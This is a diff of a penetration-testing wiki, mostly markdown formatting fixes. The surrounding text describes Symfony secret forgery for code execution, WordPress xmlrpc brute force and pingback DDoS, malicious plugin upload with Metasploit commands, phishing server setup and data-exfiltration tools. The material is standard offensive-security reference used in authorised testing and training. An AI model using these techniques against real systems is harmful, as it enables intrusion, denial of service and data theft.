+[ezPlatform](https://ezplatform.com), the successor of [ezPublish](https://en.wikipedia.org/wiki/EZ\_Publish), still uses Symfony. On Jun 10, 2019, a [commit](https://github.com/ezsystems/ezplatform/commit/974f2a70d9d0507ba7ca17226693b1a4967f23cf#diff-f579cccc964135c7d644c7b2d3b0d3ecR59) set the default key to `ff6dc61a329dc96652bb092ec58981f7`. Vulnerable versions range from 3.0-alpha1 to 3.1.1 (current).
 
-Although the [documentation](https://doc.ezplatform.com/en/latest/getting_started/install_ez_platform/#change-installation-parameters) states that the secret should be changed, it is not enforced.
+Although the [documentation](https://doc.ezplatform.com/en/latest/getting\_started/install\_ez\_platform/#change-installation-parameters) states that the secret should be changed, it is not enforced.
 
-#### ezPlatform 2.x: `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt` <a href="ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit" id="ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit"></a>
+#### ezPlatform 2.x: `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt` <a href="#ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit" id="ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit"></a>
 
 Like Symfony's skeleton, you will be prompted to enter a secret during the installation. The default value is `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt`.
 
-#### Bolt CMS <= 3.7 (latest): `md5(__DIR__)` <a href="bolt-cms-37-latest-md5__dir__" id="bolt-cms-37-latest-md5__dir__"></a>
+#### Bolt CMS <= 3.7 (latest): `md5(__DIR__)` <a href="#bolt-cms-37-latest-md5__dir__" id="bolt-cms-37-latest-md5__dir__"></a>
 
 [Bolt CMS](https://bolt.cm) uses [Silex](https://github.com/silexphp/Silex), a deprecated micro-framework based on Symfony. It sets up the secret key using this computation:
 
@@ -336,7 +336,7 @@ As such, one can guess the secret, or use a Full Path Disclosure vulnerability t
 
 If you did not succeed with default secret keys, do not despair: there are other ways.
 
-### Bruteforce <a href="bruteforce" id="bruteforce"></a>
+### Bruteforce <a href="#bruteforce" id="bruteforce"></a>
 
 Since the secret is often set manually (as opposed to generated randomly), people will often use a passphrase instead of a secure random value, which makes it bruteforceable if we have a hash to bruteforce it against. Obviously, a valid `/_fragment` URL, such as one generated by Symfony, would provide us a valid message-hash tuple to bruteforce the secret.
 
@@ -348,11 +348,11 @@ At the beginning of this blogpost, we said that Symfony's secret had several use
 
 _The reverse engineering of the construction of those tokens is left as an exercise to the reader._
 
-### Going further: eZPublish <a href="going-further-ezpublish" id="going-further-ezpublish"></a>
+### Going further: eZPublish <a href="#going-further-ezpublish" id="going-further-ezpublish"></a>
 
 As an example to how secrets can be bruteforced in order to achieve code execution, we'll see how we can find out eZPublish 2014.07's secret.
 
-#### Finding bruteforce material <a href="finding-bruteforce-material" id="finding-bruteforce-material"></a>
+#### Finding bruteforce material <a href="#finding-bruteforce-material" id="finding-bruteforce-material"></a>
 
 eZPublish generates its CSRF tokens like this:
 
@@ -386,7 +386,7 @@ gettimeofday(&tv, NULL);
 return strpprintf(0, "%s%08x%05x", prefix, tv.tv_sec, tv.tv_usec);
 ```
 
-#### Disclosing the timestamp <a href="disclosing-the-timestamp" id="disclosing-the-timestamp"></a>
+#### Disclosing the timestamp <a href="#disclosing-the-timestamp" id="disclosing-the-timestamp"></a>
 
 Luckily, we know this secret gets generated on the last step of the installation, right after the website gets set up. This means we can probably leak the timestamp used to generate this hash.
 
@@ -398,7 +398,7 @@ _Sample log contents: the timestamp is similar to the one used to compute secret
 
 If logs aren't available, one can use the very powerful search engine of eZPublish to find the time of creation of the very first element of the website. Indeed, when the site is created, a lot of timestamps are put into the database. This means that the timestamp of the initial data of the eZPublish website is the same as the one used to compute `uniqid()`. We can look for the `landing_page` _ContentObject_ and find out its timestamp.
 
-## Bruteforcing the missing bits <a href="bruteforcing-the-missing-bits" id="bruteforcing-the-missing-bits"></a>
+## Bruteforcing the missing bits <a href="#bruteforcing-the-missing-bits" id="bruteforcing-the-missing-bits"></a>
 
 We are now aware of the timestamp used to compute the secret, as well as a hash of the following form:
 
@@ -415,15 +415,15 @@ Using our cracking machine, which boasts 8 GPUs, we can crack this hash in _unde
 
 After getting the hash, we can use `/_fragment` to execute code.
 
-## Conclusion <a href="conclusion" id="conclusion"></a>
+## Conclusion <a href="#conclusion" id="conclusion"></a>
 
 Symfony is now a core component of many PHP applications. As such, any security risk that affects the framework affects lots of websites. As demonstrated in this article, either a weak secret or a less-impactful vulnerability allows attackers to obtain **remote code execution**.
 
 As a blue teamer, you should have a look at every of your Symfony-dependent websites. Up-to-date software cannot be ruled out for vulnerabilities, as the secret key is generated at the first installation of the product. Hence, if you created a Symfony-3.x-based website a few years ago, and kept it up-to-date along the way, chances are the secret key is still the default one.
 
-## Exploitation <a href="exploitation" id="exploitation"></a>
+## Exploitation <a href="#exploitation" id="exploitation"></a>
 
-### Theory <a href="theory" id="theory"></a>
+### Theory <a href="#theory" id="theory"></a>
 
 On the first hand, we have a few things to worry about when exploiting this vulnerability:
 
@@ -441,7 +441,7 @@ On the other hand, we can take advantage of a few things:
 
 The last point allows us to test secret values without worrying about which function or method we are going to call afterwards.
 
-### Practice <a href="practice" id="practice"></a>
+### Practice <a href="#practice" id="practice"></a>
 
 Let's say we are attacking `https://target.com/_fragment`. To be able to properly sign a URL, we need knowledge of:
 
@@ -509,7 +509,7 @@ _Sample output using `Inline::parse` with a serialized payload_
 
 The exploit will therefore run through every possible variable combination, and then try out the two exploitation methods. The code is available on [our GitHub](https://github.com/ambionics/symfony-exploits).
 
-## Accessing symphony /\_profiler information 
+## Accessing symphony /\_profiler information&#x20;
 
 (info taken from [https://flattsecurity.hatenablog.com/entry/2020/11/02/124807](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807))
 
diff --git a/pentesting/pentesting-web/uncovering-cloudflare.md b/pentesting/pentesting-web/uncovering-cloudflare.md
index 655d8f44..325139ec 100644
--- a/pentesting/pentesting-web/uncovering-cloudflare.md
+++ b/pentesting/pentesting-web/uncovering-cloudflare.md
@@ -2,8 +2,8 @@
 
 Techniques to try to uncover web servers behind cloudflare:
 
-* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) 
+* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html)&#x20;
 * Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
 * ****[**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
 * You can also use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
-* If you find a** SSRF inside the web application **you can abuse it to obtain the IP address of the server.
+* If you find a **SSRF inside the web application** you can abuse it to obtain the IP address of the server.
diff --git a/pentesting/pentesting-web/web-api-pentesting.md b/pentesting/pentesting-web/web-api-pentesting.md
index 5364feed..216dc570 100644
--- a/pentesting/pentesting-web/web-api-pentesting.md
+++ b/pentesting/pentesting-web/web-api-pentesting.md
@@ -10,7 +10,7 @@ Main:
     * An example of this documentation can be found in [http://www.dneonline.com/calculator.asmx](http://www.dneonline.com/calculator.asmx) (WSDL document in [http://www.dneonline.com/calculator.asmx?wsdl](http://www.dneonline.com/calculator.asmx?wsdl)) and you can see an example request calling the `Add` method in [http://www.dneonline.com/calculator.asmx?op=Add](http://www.dneonline.com/calculator.asmx?op=Add)
     * For parsing these files and create example requests you and use the tool **SOAPUI** or the **WSDLer** Burp Suite Extension.
 
-     
+    &#x20;
 * **REST APIs (JSON)**
   * The standard documentation is the WADL file. Find an example here: [https://www.w3.org/Submission/wadl/](https://www.w3.org/Submission/wadl/). However, there are other more developer friendly API representation engines like [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/) (check the demo in the page)
   * For parsing these files and create example requests you an use the tool **Postman**
@@ -37,30 +37,30 @@ Always check the [**CORS**](../../pentesting-web/cors-bypass.md) configuration o
 ### Patterns
 
 Search for API patterns inside the api and try to use it to discover more.\
-If you find  _/api/albums/**\<album_id>**/photos/**\<photo_id>**_** **you could try also things like  _/api/**posts**/\<post_id>/**comment**/_. Use some fuzzer to discover this new endpoints.
+If you find  _/api/albums/**\<album\_id>**/photos/**\<photo\_id>**_** ** you could try also things like  _/api/**posts**/\<post\_id>/**comment**/_. Use some fuzzer to discover this new endpoints.
 
 ### Add parameters
 
 Something like the following example might get you access to another user’s photo album:\
-_/api/MyPictureList → /api/MyPictureList?**user_id=\<other_user_id>**_
+_/api/MyPictureList → /api/MyPictureList?**user\_id=\<other\_user\_id>**_
 
 ### Replace parameters
 
-You can try to **fuzz parameters** or **use **parameters **you have seen** in a different endpoints to try to access other information
+You can try to **fuzz parameters** or **use** parameters **you have seen** in a different endpoints to try to access other information
 
-For example, if you see something like: _/api/albums?**album_id=\<album id>**_
+For example, if you see something like: _/api/albums?**album\_id=\<album id>**_
 
-You could **replace **the **`album_id`** parameter with something completely different and potentially get other data: _/api/albums?**account_id=\<account id>**_
+You could **replace** the **`album_id`** parameter with something completely different and potentially get other data: _/api/albums?**account\_id=\<account id>**_
 
 ### Parameter pollution
 
- /api/account?**id=\<your account id>** →  /api/account?**id=\<your account id>\&id=\<admin's account id>**
+&#x20;/api/account?**id=\<your account id>** →  /api/account?**id=\<your account id>\&id=\<admin's account id>**
 
 ### Wildcard parameter
 
-Try to use the following symbols as wildcards: **\***, **%**, **\_**,** .**
+Try to use the following symbols as wildcards: **\***, **%**, **\_**, **.**
 
-*  /api/users/\*
+* &#x20;/api/users/\*
 * /api/users/%
 * /api/users/\_
 * /api/users/.
@@ -73,13 +73,13 @@ You can try to use the HTTP methods: **GET, POST, PUT, DELETE, PATCH, INVENTED**
 
 Try to play between the following content-types (bodifying acordinly the request body) to make the web server behave unexpectedly:
 
-* **x-www-form-urlencoded **--> user=test
-* **application/xml **-->  \<user>test\</user>
-* **application/json **-->  {"user": "test"}
+* **x-www-form-urlencoded** --> user=test
+* **application/xml** -->  \<user>test\</user>
+* **application/json** -->  {"user": "test"}
 
 ### Parameters types
 
-If **JSON **data is working try so send unexpected data types like:
+If **JSON** data is working try so send unexpected data types like:
 
 * {"username": "John"}
 * {"username": true}
@@ -90,7 +90,7 @@ If **JSON **data is working try so send unexpected data types like:
 * {"username": {"$neq": "lalala"}}
 * any other combination you may imagine
 
-If you can send **XML **data, check for [XXE injections](../../pentesting-web/xxe-xee-xml-external-entity.md).
+If you can send **XML** data, check for [XXE injections](../../pentesting-web/xxe-xee-xml-external-entity.md).
 
 If you send regular POST data, try to send arrays and dictionaries:
 
@@ -108,12 +108,12 @@ Old versions may be still be in use and be more vulnerable than latest endpoints
 * `/api/v1/login`
 * `/api/v2/login`\
 
-*  `/api/CharityEventFeb2020/user/pp/<ID>`
-*  `/api/CharityEventFeb2021/user/pp/<ID>`
+* &#x20;`/api/CharityEventFeb2020/user/pp/<ID>`
+* &#x20;`/api/CharityEventFeb2021/user/pp/<ID>`
 
 ## Owasp API Security Top 10
 
-Read this document to learn how to **search **and **exploit **Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)
+Read this document to learn how to **search** and **exploit** Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)
 
 ## API Security Checklist
 
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
index 2578ecb8..27ce25d4 100644
--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@@ -3,8 +3,8 @@
 ## Basic Information
 
 **Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
-__**Themes files can be found in /wp-content/themes/, **so if you change some php of the theme to get RCE you probably will use that path. For example:** **Using **theme twentytwelve **you can **access **the **404.php **file in**: **[**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
-**Another useful url could be: **[**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****
+__**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: **** Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
+**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****
 
 In **wp-config.php** you can find the root password of the database.
 
@@ -21,7 +21,7 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
   * `/login.php`
   * `/wp-login.php`
 * `xmlrpc.php` is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
-*  The `wp-content` folder is the main directory where plugins and themes are stored.
+* &#x20;The `wp-content` folder is the main directory where plugins and themes are stored.
 * `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
 * `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
 
@@ -41,9 +41,9 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
 
 ### **Get WordPress version**
 
-Check if you can find the files` /license.txt` or `/readme.html`
+Check if you can find the files `/license.txt` or `/readme.html`
 
-Inside the **source code **of the page (example from [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
+Inside the **source code** of the page (example from [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
 
 * `meta name`
 
@@ -103,13 +103,13 @@ curl http://blog.example.com/wp-json/wp/v2/users
 
 **Only information about the users that has this feature enable will be provided**.
 
-Also note that _**/wp-json/wp/v2/pages **could leak IP addresses**.**_
+Also note that _**/wp-json/wp/v2/pages** could leak IP addresses**.**_
 
 ### XML-RPC
 
 If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
 
-To see if it is active try to access to _**/xmlrpc.php **_and send this request:
+To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
 
 #### Check
 
@@ -124,7 +124,7 @@ To see if it is active try to access to _**/xmlrpc.php **_and send this request:
 
 #### Credentials Bruteforce
 
-_**wp.getUserBlogs**_, _**wp.getCategories** _or_** metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
+_**wp.getUserBlogs**_, _**wp.getCategories** _ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
 
 ```markup
 <methodCall>
@@ -138,14 +138,14 @@ _**wp.getUserBlogs**_, _**wp.getCategories** _or_** metaWeblog.getUsersBlogs**_
 
 The message _"Incorrect username or password"_ inside a 200 code response should appear if the credentials aren't valid.
 
-Also there is a **faster way **to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
+Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
 
 ![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2FFX0g2BLsdfdQnq1xXx3N%2Ffile.jpeg?alt=media)
 
 #### DDoS or port scanning
 
 If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
-This can be used to ask **thousands **of Wordpress **sites **to **access **one **location **(so a **DDoS **is caused in that location) or you can use it to make **Wordpress **lo **scan** some internal **network **(you can indicate any port).
+This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
 
 ```markup
 <methodCall>
@@ -159,19 +159,19 @@ This can be used to ask **thousands **of Wordpress **sites **to **access **one *
 
 ![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
 
-If you get **faultCode** with** **a value **greater **then **0 **(17), it means the port is open.
+If you get **faultCode** with **** a value **greater** then **0** (17), it means the port is open.
 
 Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS.
 
 ### wp-cron.php DoS
 
 This file usually exists under the root of the Wordpress site: `/wp-cron.php`\
-When this file is **accessed **a "**heavy**" MySQL **query **is performed, so I could be used by **attackers **to **cause **a **DoS**.\
+When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
 Also,  by default, the `wp-cron.php` is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
 
 It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).
 
-#### ** Bruteforce**
+#### &#x20;**Bruteforce**
 
 ```markup
 <methodCall>
@@ -308,21 +308,21 @@ Access it and you will see the URL to execute the reverse shell:
 
 ### Uploading and activating malicious plugin
 
-#### **(This part is copied from **[**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
+#### **(This part is copied from** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
 
 Some time logon users do not own writable authorization to make modifications to the WordPress theme, so we choose “Inject WP pulgin malicious” as an alternative strategy to acquiring a web shell.
 
 So, once you have access to a WordPress dashboard, you can attempt installing a malicious plugin. Here I’ve already downloaded the vulnerable plugin from exploit db.
 
-Click [**here**](https://www.exploit-db.com/exploits/36374)** **to download the plugin for practice.
+Click [**here**](https://www.exploit-db.com/exploits/36374) **** to download the plugin for practice.
 
-![](https://i1.wp.com/1.bp.blogspot.com/-Y_Aw7zSFJZs/XY9pymSjdvI/AAAAAAAAguY/FGyGEzlx9VIqNYyyra9r55IklNmwXwMQwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
+![](https://i1.wp.com/1.bp.blogspot.com/-Y\_Aw7zSFJZs/XY9pymSjdvI/AAAAAAAAguY/FGyGEzlx9VIqNYyyra9r55IklNmwXwMQwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
 
 Since we have zip file for plugin and now it’s time to upload the plugin.
 
 Dashboard > plugins > upload plugin
 
-![](https://i0.wp.com/1.bp.blogspot.com/-FLhqB0I32Mg/XY9pyrlKWAI/AAAAAAAAguU/tofpIetTCv4Mho5y5D_sDuuokC7mDmKowCLcBGAsYHQ/s1600/11.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-FLhqB0I32Mg/XY9pyrlKWAI/AAAAAAAAguU/tofpIetTCv4Mho5y5D\_sDuuokC7mDmKowCLcBGAsYHQ/s1600/11.png?w=687\&ssl=1)
 
 Browse the downloaded zip file as shown.
 
@@ -336,12 +336,12 @@ When everything is well setup then go for exploiting. Since we have installed vu
 
 You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute the following command:
 
-| 1234 | use exploit/unix/webapp/wp_slideshowgallery_uploadset rhosts 192.168.1.101set targeturi /wordpressexploit |
-| ---- | --------------------------------------------------------------------------------------------------------- |
+| 1234 | use exploit/unix/webapp/wp\_slideshowgallery\_uploadset rhosts 192.168.1.101set targeturi /wordpressexploit |
+| ---- | ----------------------------------------------------------------------------------------------------------- |
 
 As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a WordPress platformed website.
 
-![](https://i1.wp.com/1.bp.blogspot.com/-s6Yblqj-zQ8/XY9pz0qYWAI/AAAAAAAAguo/WXgEBKIB64Ian_RQWaltbEtdzCNpexKOwCLcBGAsYHQ/s1600/14.png?w=687\&ssl=1)
+![](https://i1.wp.com/1.bp.blogspot.com/-s6Yblqj-zQ8/XY9pz0qYWAI/AAAAAAAAguo/WXgEBKIB64Ian\_RQWaltbEtdzCNpexKOwCLcBGAsYHQ/s1600/14.png?w=687\&ssl=1)
 
 ## Post Exploitation
 
@@ -369,7 +369,7 @@ add_filter( 'auto_update_plugin', '__return_true' );
 add_filter( 'auto_update_theme', '__return_true' );
 ```
 
-Also,** only install trustable WordPress plugins and themes**.
+Also, **only install trustable WordPress plugins and themes**.
 
 ### Security Plugins
 
@@ -379,10 +379,10 @@ Also,** only install trustable WordPress plugins and themes**.
 
 ### **Other Recommendations**
 
-* Remove default **admin **user
-* Use **strong passwords **and **2FA**
-* Periodically **review **users **permissions**
-* **Limit login attempts **to prevent Brute Force attacks
+* Remove default **admin** user
+* Use **strong passwords** and **2FA**
+* Periodically **review** users **permissions**
+* **Limit login attempts** to prevent Brute Force attacks
 * Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
 
 
diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md
index 64c70c4a..0cca2a5e 100644
--- a/phishing-methodology/README.md
+++ b/phishing-methodology/README.md
@@ -129,7 +129,7 @@ Then add the domain to the following files:
 
 **Change also the values of the following variables inside /etc/postfix/main.cf**
 
-`myhostname = <domain>  `\
+`myhostname = <domain>`  \
 `mydestination = $myhostname, <domain>, localhost.com, localhost`
 
 Finally modify the files **`/etc/hostname`** and **`/etc/mailname`** to your domain name and **restart your VPS.**
@@ -465,7 +465,7 @@ You can **buy a domain with a very similar name** to the victims domain **and/or
 
 ### Evaluate the phishing
 
-Use [**Phishious **](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
+Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
 
 ## References
 
diff --git a/phishing-methodology/phishing-documents.md b/phishing-methodology/phishing-documents.md
index 5c5e41b8..bc6f3dba 100644
--- a/phishing-methodology/phishing-documents.md
+++ b/phishing-methodology/phishing-documents.md
@@ -17,7 +17,7 @@ DOCX files referencing a remote template (File –Options –Add-ins –Manage:
 ### Word with external image
 
 Go to: _Insert --> Quick Parts --> Field_\
-_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: _[http://\<ip>/whatever](http://\<ip>/whatever)
+_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ [http://\<ip>/whatever](http://\<ip>/whatever)
 
 ![](<../.gitbook/assets/image (316).png>)
 
diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md
index 05618b7b..51073d61 100644
--- a/physical-attacks/escaping-from-gui-applications/README.md
+++ b/physical-attacks/escaping-from-gui-applications/README.md
@@ -2,7 +2,7 @@
 
 ## Check for possible actions inside the GUI application
 
-**Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will** offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options:
+**Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will **offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options:
 
 * Close/Close as
 * Open/Open with
@@ -20,15 +20,15 @@ You should check if you can:
 
 ### Command Execution
 
-Maybe **using a**_** Open with**_** option** you can open/execute some kind of shell.
+Maybe **using a **_**Open with**_** option** you can open/execute some kind of shell.
 
 #### Windows
 
-For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc... _find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
+For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
 
-#### \*NIX_ _
+#### \*NIX __&#x20;
 
-_bash, sh, zsh... _More here: [https://gtfobins.github.io/](https://gtfobins.github.io)
+_bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io)
 
 ## Windows
 
@@ -75,27 +75,27 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
 
 ### ShortCuts
 
-* Sticky Keys – Press SHIFT 5 times 
-* Mouse Keys – SHIFT+ALT+NUMLOCK 
-* High Contrast – SHIFT+ALT+PRINTSCN 
-* Toggle Keys – Hold NUMLOCK for 5 seconds 
-* Filter Keys – Hold right SHIFT for 12 seconds 
-* WINDOWS+F1 – Windows Search 
-* WINDOWS+D – Show Desktop 
-* WINDOWS+E – Launch Windows Explorer 
-* WINDOWS+R – Run 
-* WINDOWS+U – Ease of Access Centre 
-* WINDOWS+F – Search 
-* SHIFT+F10 – Context Menu 
-* CTRL+SHIFT+ESC – Task Manager 
-* CTRL+ALT+DEL – Splash screen on newer Windows versions 
-* F1 – Help F3 – Search 
-* F6 – Address Bar 
-* F11 – Toggle full screen within Internet Explorer 
-* CTRL+H – Internet Explorer History 
-* CTRL+T – Internet Explorer – New Tab 
-* CTRL+N – Internet Explorer – New Page 
-* CTRL+O – Open File 
+* Sticky Keys – Press SHIFT 5 times&#x20;
+* Mouse Keys – SHIFT+ALT+NUMLOCK&#x20;
+* High Contrast – SHIFT+ALT+PRINTSCN&#x20;
+* Toggle Keys – Hold NUMLOCK for 5 seconds&#x20;
+* Filter Keys – Hold right SHIFT for 12 seconds&#x20;
+* WINDOWS+F1 – Windows Search&#x20;
+* WINDOWS+D – Show Desktop&#x20;
+* WINDOWS+E – Launch Windows Explorer&#x20;
+* WINDOWS+R – Run&#x20;
+* WINDOWS+U – Ease of Access Centre&#x20;
+* WINDOWS+F – Search&#x20;
+* SHIFT+F10 – Context Menu&#x20;
+* CTRL+SHIFT+ESC – Task Manager&#x20;
+* CTRL+ALT+DEL – Splash screen on newer Windows versions&#x20;
+* F1 – Help F3 – Search&#x20;
+* F6 – Address Bar&#x20;
+* F11 – Toggle full screen within Internet Explorer&#x20;
+* CTRL+H – Internet Explorer History&#x20;
+* CTRL+T – Internet Explorer – New Tab&#x20;
+* CTRL+N – Internet Explorer – New Page&#x20;
+* CTRL+O – Open File&#x20;
 * CTRL+S – Save CTRL+N – New RDP / Citrix
 
 ### Swipes
@@ -181,7 +181,7 @@ To see Today view
 
 To change to next/last App
 
-#### Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad + ** Move the Slide to **power off** slider all the way to the right,
+#### Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right,
 
 To power off
 
diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
index 731f09f6..efebe2a6 100644
--- a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
+++ b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
@@ -41,4 +41,4 @@ That's it. You should now be able to see the true extensions of the files in you
 
 Copyright © 2008-2018 by Christopher Heng. All rights reserved. Get more "How To" guides and tutorials from [https://www.howtohaven.com/](https://www.howtohaven.com).
 
-**This article can be found at **[**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)****
+**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)****
diff --git a/post-exploitation.md b/post-exploitation.md
index 85b526b7..1fad8ccc 100644
--- a/post-exploitation.md
+++ b/post-exploitation.md
@@ -10,7 +10,7 @@
 * ****[**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to.
 * ****[**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
 * ****[**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API.
-* ****[**SlackPirate**](https://github.com/emtunc/SlackPirate)**: **This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.
+* ****[**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.
 *   ****[**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review.
 
 
diff --git a/reversing/common-api-used-in-malware.md b/reversing/common-api-used-in-malware.md
index 1191c8db..21661309 100644
--- a/reversing/common-api-used-in-malware.md
+++ b/reversing/common-api-used-in-malware.md
@@ -127,9 +127,9 @@ The malware will unmap the legitimate code from memory of the process and load a
 
 ## Hooking
 
-* The **SSDT **(**System Service Descriptor Table**) points to kernel functions (ntoskrnl.exe) or GUI driver (win32k.sys) so user processes can call these functions.
+* The **SSDT** (**System Service Descriptor Table**) points to kernel functions (ntoskrnl.exe) or GUI driver (win32k.sys) so user processes can call these functions.
   * A rootkit may modify these pointer to addresses that he controls
 * **IRP** (**I/O Request Packets**) transmit pieces of data from one component to another. Almost everything in the kernel uses IRPs and each device object has its own function table that can be hooked: DKOM (Direct Kernel Object Manipulation)
 * The **IAT** (**Import Address Table**) is useful to resolve dependencies. It's possible to hook this table in order to hijack the code that will be called.
-* **EAT **(**Export Address Table**) Hooks. This hooks can be done from **userland**. The goal is to hook exported functions by DLLs.
